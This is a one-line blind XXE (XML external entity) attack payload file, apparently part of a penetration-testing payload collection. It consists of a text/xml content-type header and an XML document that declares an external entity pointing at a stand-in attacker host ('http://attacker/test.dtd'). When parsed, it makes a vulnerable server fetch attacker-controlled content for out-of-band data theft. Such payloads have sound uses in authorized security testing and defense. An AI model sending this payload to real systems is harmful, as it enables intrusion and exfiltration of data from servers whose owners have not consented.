mgeeky-Penetration-Testing-.../web/blind-xxe-payload-1.txt

3 lines
155 B
Plaintext

Content-Type: text/xml
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxetestd [<!ENTITY xxetest SYSTEM "http://attacker/test.dtd">]><foo>&xxetest;</foo>